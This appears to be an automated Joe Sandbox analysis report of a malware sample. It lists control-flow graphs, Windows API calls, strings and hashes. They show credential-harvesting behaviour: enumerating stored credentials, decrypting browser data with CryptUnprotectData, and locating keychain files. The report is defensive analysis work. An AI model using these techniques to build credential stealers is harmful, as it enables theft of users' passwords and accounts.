40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040DDAD
                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                      • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                    • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                    • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                    • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                    • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                    • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                    • memset.MSVCRT ref: 0040DF5F
                                                                                                    • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                    • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                    • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                    • String ID: dllhost.exe$p+8w@F8w@B8w$taskhost.exe$taskhostex.exe
                                                                                                    • API String ID: 708747863-2348828428
                                                                                                    • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                    • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                    • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                    • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 644 413eb7-413ebd 641->644 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 644->645 646 413ebf-413ec6 free 644->646 648 413edb-413ee2 645->648 646->648 655 413ee4 648->655 656 413ee7-413efe 648->656 662 413ea2-413eae CloseHandle 650->662 653 413e61-413e68 651->653 654 413e37-413e44 GetModuleHandleW 651->654 653->650 659 413e6a-413e76 653->659 654->653 658 413e46-413e5c GetProcAddress 654->658 655->656 656->638 658->653 659->650 662->641
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                    • memset.MSVCRT ref: 00413D7F
                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                    • memset.MSVCRT ref: 00413E07
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                    • free.MSVCRT ref: 00413EC1
                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                    • API String ID: 1344430650-1740548384
                                                                                                    • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                    • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                    • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                    • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 754 40b58d-40b59e 755 40b5a4-40b5c0 GetModuleHandleW FindResourceW 754->755 756 40b62e-40b632 754->756 757 40b5c2-40b5ce LoadResource 755->757 758 40b5e7 755->758 757->758 759 40b5d0-40b5e5 SizeofResource LockResource 757->759 760 40b5e9-40b5eb 758->760 759->760 760->756 761 40b5ed-40b5ef 760->761 761->756 762 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 761->762 762->756
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                                                    • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                    • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                    • String ID: AE$BIN
                                                                                                    • API String ID: 1668488027-3931574542
                                                                                                    • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                    • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                    • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                    • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                    APIs
                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                    • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 767404330-0
                                                                                                    • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                                    • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                    • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                                    • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                    • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$FirstNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 1690352074-0
                                                                                                    • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                    • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                    • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                    • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0041898C
                                                                                                    • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoSystemmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3558857096-0
                                                                                                    • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                    • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                    • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                    • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 19 4455e5 5->19 20 4455e8-4455f9 5->20 10 445800-445809 6->10 11 445856-44585f 10->11 12 44580b-44581e call 40a889 call 403e2d 10->12 15 445861-445874 call 40a889 call 403c9c 11->15 16 4458ac-4458b5 11->16 42 445823-445826 12->42 49 445879-44587c 15->49 21 44594f-445958 16->21 22 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 16->22 19->20 23 445672-445683 call 40a889 call 403fbe 20->23 24 4455fb-445601 20->24 35 4459f2-4459fa 21->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 21->36 135 44592d-445945 call 40b6ef 22->135 136 44594a 22->136 84 445685 23->84 85 4456b2-4456b5 call 40b1ab 23->85 29 445605-445607 24->29 30 445603 24->30 29->23 38 445609-44560d 29->38 30->29 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->23 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 40->3 41->40 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 51->11 67 44582e-445847 call 40a9b5 call 4087b3 52->67 61 445d1c-445d25 53->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->68 69 445b98-445ba0 54->69 73 445fae-445fb2 61->73 74 445d2b-445d3b 61->74 168 445cf5 62->168 169 445cfc-445d03 62->169 64->16 81 445884-44589d call 40a9b5 call 4087b3 65->81 138 445849 67->138 247 445c77 68->247 69->68 83 445ba2-445bcf call 4099c6 call 445403 call 445389 69->83 90 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->90 91 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->91 156 44589f 81->156 83->53 100 44568b-4456a4 call 40a9b5 call 4087b3 84->100 104 4456ba-4456c4 85->104 162 445d67-445d6c 90->162 163 445d71-445d83 call 445093 90->163 196 445e17 91->196 197 445e1e-445e25 91->197 158 4456a9-4456b0 100->158 118 4457f9 104->118 119 4456ca-4456d3 call 413cfa call 413d4c 104->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->21 138->51 150->104 151->150 153->154 154->35 156->64 158->85 158->100 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->73 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 246 445798-4457ca call 40b2cc call 409d1f call 409b98 206->246 207->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->207 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004455C2
                                                                                                    • wcsrchr.MSVCRT ref: 004455DA
                                                                                                    • memset.MSVCRT ref: 0044570D
                                                                                                    • memset.MSVCRT ref: 00445725
                                                                                                      • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                      • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                      • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                      • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                      • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                      • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                      • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                      • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                    • memset.MSVCRT ref: 0044573D
                                                                                                    • memset.MSVCRT ref: 00445755
                                                                                                    • memset.MSVCRT ref: 004458CB
                                                                                                    • memset.MSVCRT ref: 004458E3
                                                                                                    • memset.MSVCRT ref: 0044596E
                                                                                                    • memset.MSVCRT ref: 00445A10
                                                                                                    • memset.MSVCRT ref: 00445A28
                                                                                                    • memset.MSVCRT ref: 00445AC6
                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                      • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                      • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                      • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                      • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                    • memset.MSVCRT ref: 00445B52
                                                                                                    • memset.MSVCRT ref: 00445B6A
                                                                                                    • memset.MSVCRT ref: 00445C9B
                                                                                                    • memset.MSVCRT ref: 00445CB3
                                                                                                    • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                    • memset.MSVCRT ref: 00445B82
                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                    • memset.MSVCRT ref: 00445986
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                    • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                    • API String ID: 1963886904-3798722523
                                                                                                    • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                    • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                    • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                    • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                      • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                      • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                      • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                    • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                                                    • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                    • String ID: $/deleteregkey$/savelangfile
                                                                                                    • API String ID: 2744995895-28296030
                                                                                                    • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                    • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                    • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                    • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040B71C
                                                                                                      • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                      • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                    • wcsrchr.MSVCRT ref: 0040B738
                                                                                                    • memset.MSVCRT ref: 0040B756
                                                                                                    • memset.MSVCRT ref: 0040B7F5
                                                                                                    • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                    • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                    • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                    • memset.MSVCRT ref: 0040B851
                                                                                                    • memset.MSVCRT ref: 0040B8CA
                                                                                                    • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                      • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                    • memset.MSVCRT ref: 0040BB53
                                                                                                    • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                    Strings
                                                                                                    Memory Dump Source
